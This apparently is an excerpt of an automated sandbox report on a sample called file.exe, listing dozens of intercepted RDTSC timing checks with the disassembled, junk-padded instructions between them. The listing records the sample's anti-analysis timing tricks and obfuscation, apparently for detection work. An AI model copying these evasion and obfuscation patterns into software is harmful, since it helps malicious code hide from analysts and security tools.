                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001A5 second address: 4A001AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001AB second address: 4A001FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e jmp 00007FB3E1482E96h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FB3E1482E98h 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001FA second address: 4A0020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E0C7B69Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0020C second address: 4A00210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00210 second address: 4A00228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3E0C7B69Dh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00228 second address: 4A0022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0022E second address: 4A00232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00232 second address: 4A002A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB3E1482E96h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 call 00007FB3E1482E8Eh 0x0000001a pushfd 0x0000001b jmp 00007FB3E1482E92h 0x00000020 xor ax, 1EB8h 0x00000025 jmp 00007FB3E1482E8Bh 0x0000002a popfd 0x0000002b pop esi 0x0000002c mov ch, dh 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ebx, esi 0x00000035 popad 0x00000036 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002A3 second address: 4A003C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e pushfd 0x0000000f jmp 00007FB3E0C7B6A8h 0x00000014 add eax, 1BE47AA8h 0x0000001a jmp 00007FB3E0C7B69Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 mov dl, ah 0x00000025 pushfd 0x00000026 jmp 00007FB3E0C7B6A1h 0x0000002b or ecx, 3E119EC6h 0x00000031 jmp 00007FB3E0C7B6A1h 0x00000036 popfd 0x00000037 popad 0x00000038 test esi, esi 0x0000003a jmp 00007FB3E0C7B69Eh 0x0000003f je 00007FB45319997Fh 0x00000045 jmp 00007FB3E0C7B6A0h 0x0000004a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000051 pushad 0x00000052 mov di, cx 0x00000055 popad 0x00000056 je 00007FB453199973h 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007FB3E0C7B6A1h 0x00000063 pop eax 0x00000064 mov esi, edx 0x00000066 popad 0x00000067 mov edx, dword ptr [esi+44h] 0x0000006a jmp 00007FB3E0C7B6A3h 0x0000006f or edx, dword ptr [ebp+0Ch] 0x00000072 jmp 00007FB3E0C7B6A6h 0x00000077 test edx, 61000000h 0x0000007d jmp 00007FB3E0C7B6A0h 0x00000082 jne 00007FB45319996Eh 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c jmp 00007FB3E0C7B69Ah 0x00000091 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003C4 second address: 4A003C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003C8 second address: 4A003CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003CE second address: 4A003DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E8Dh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003DF second address: 4A0041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007FB3E0C7B69Eh 0x00000014 jne 00007FB45319992Fh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d call 00007FB3E0C7B69Ch 0x00000022 pop esi 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0041E second address: 4A00422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F079A second address: 49F079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F079E second address: 49F07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07A4 second address: 49F07AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07AA second address: 49F07AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07AE second address: 49F07C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FB3E0C7B69Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07C8 second address: 49F07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07CC second address: 49F07D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07D2 second address: 49F07D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07D8 second address: 49F07DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07DC second address: 49F0802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FB3E1482E96h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0802 second address: 49F08D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB3E0C7B69Eh 0x00000012 and cx, 1D98h 0x00000017 jmp 00007FB3E0C7B69Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FB3E0C7B6A8h 0x00000023 sub ax, 47F8h 0x00000028 jmp 00007FB3E0C7B69Bh 0x0000002d popfd 0x0000002e popad 0x0000002f and esp, FFFFFFF8h 0x00000032 jmp 00007FB3E0C7B6A6h 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FB3E0C7B6A0h 0x0000003d push eax 0x0000003e pushad 0x0000003f mov ecx, ebx 0x00000041 jmp 00007FB3E0C7B69Dh 0x00000046 popad 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FB3E0C7B6A3h 0x00000051 sub eax, 5650EE7Eh 0x00000057 jmp 00007FB3E0C7B6A9h 0x0000005c popfd 0x0000005d mov dh, ch 0x0000005f popad 0x00000060 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08D9 second address: 49F0901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E1482E97h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0901 second address: 49F092D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E0C7B69Ch 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F092D second address: 49F0933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0933 second address: 49F0937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0937 second address: 49F0956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3E1482E94h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0956 second address: 49F0987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3E0C7B6A1h 0x00000008 push eax 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+08h] 0x00000010 jmp 00007FB3E0C7B69Ah 0x00000015 sub ebx, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop edi 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0987 second address: 49F0A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FB3E1482E90h 0x00000010 je 00007FB4539A8867h 0x00000016 jmp 00007FB3E1482E90h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 mov di, cx 0x00000026 movzx esi, dx 0x00000029 popad 0x0000002a mov ecx, esi 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FB3E1482E8Bh 0x00000033 xor al, 0000007Eh 0x00000036 jmp 00007FB3E1482E99h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007FB3E1482E90h 0x00000042 add ax, E478h 0x00000047 jmp 00007FB3E1482E8Bh 0x0000004c popfd 0x0000004d popad 0x0000004e je 00007FB4539A8808h 0x00000054 jmp 00007FB3E1482E96h 0x00000059 test byte ptr [76FA6968h], 00000002h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A4A second address: 49F0A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A4E second address: 49F0A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A54 second address: 49F0A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A5A second address: 49F0A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A5E second address: 49F0AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB4531A0FE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB3E0C7B69Fh 0x00000017 add si, B64Eh 0x0000001c jmp 00007FB3E0C7B6A9h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0AA0 second address: 49F0AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0AA5 second address: 49F0AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push esi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0AB9 second address: 49F0ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ABD second address: 49F0ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ADA second address: 49F0B11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FB3E1482E8Eh 0x0000000f push eax 0x00000010 jmp 00007FB3E1482E8Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B11 second address: 49F0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B15 second address: 49F0B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B30 second address: 49F0B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E0C7B69Dh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B5D second address: 49F0B79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B79 second address: 49F0B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B7D second address: 49F0B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B81 second address: 49F0B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B87 second address: 49F0C06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB3E1482E8Ch 0x00000011 or ax, DC38h 0x00000016 jmp 00007FB3E1482E8Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB3E1482E98h 0x00000022 xor eax, 3648D698h 0x00000028 jmp 00007FB3E1482E8Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push dword ptr [ebp+14h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FB3E1482E95h 0x00000039 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C06 second address: 49F0C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C0B second address: 49F0C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB3E1482E8Dh 0x0000000a xor ah, FFFFFFE6h 0x0000000d jmp 00007FB3E1482E91h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push dword ptr [ebp+10h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, ax 0x0000001f push ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D14 second address: 4A00D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E0C7B6A4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D2C second address: 4A00D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D30 second address: 4A00D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FB3E0C7B6A9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D57 second address: 4A00D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D5C second address: 4A00D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB3E0C7B6A6h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D9B second address: 4A00DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DB0 second address: 4A00DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009AA second address: 4A009AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009AE second address: 4A009B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009B4 second address: 4A009BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009BA second address: 4A009BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009BE second address: 4A009E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB3E1482E8Eh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009E3 second address: 4A00A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 783A0064h 0x00000008 mov bl, BEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007FB3E0C7B69Eh 0x00000017 adc cx, CB18h 0x0000001c jmp 00007FB3E0C7B69Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 jmp 00007FB3E0C7B6A4h 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FB3E0C7B6A0h 0x00000032 sub esi, 15496CA8h 0x00000038 jmp 00007FB3E0C7B69Bh 0x0000003d popfd 0x0000003e mov cx, F79Fh 0x00000042 popad 0x00000043 popad 0x00000044 pop ebp 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A5C second address: 4A00A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A806EF second address: 4A80767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FB3E0C7B69Dh 0x0000000b sbb si, FBE6h 0x00000010 jmp 00007FB3E0C7B6A1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov dx, 5A22h 0x0000001f pushfd 0x00000020 jmp 00007FB3E0C7B6A3h 0x00000025 and esi, 6E0ED71Eh 0x0000002b jmp 00007FB3E0C7B6A9h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FB3E0C7B69Dh 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80767 second address: 4A80777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E8Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80777 second address: 4A8077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A26 second address: 4A70A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E98h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A42 second address: 4A70A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A46 second address: 4A70A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A54 second address: 4A70A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A5B second address: 4A70A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3E1482E97h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A76 second address: 4A70A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A7A second address: 4A70A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A8D second address: 4A70A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70A93 second address: 4A70AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AAB second address: 4A70AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
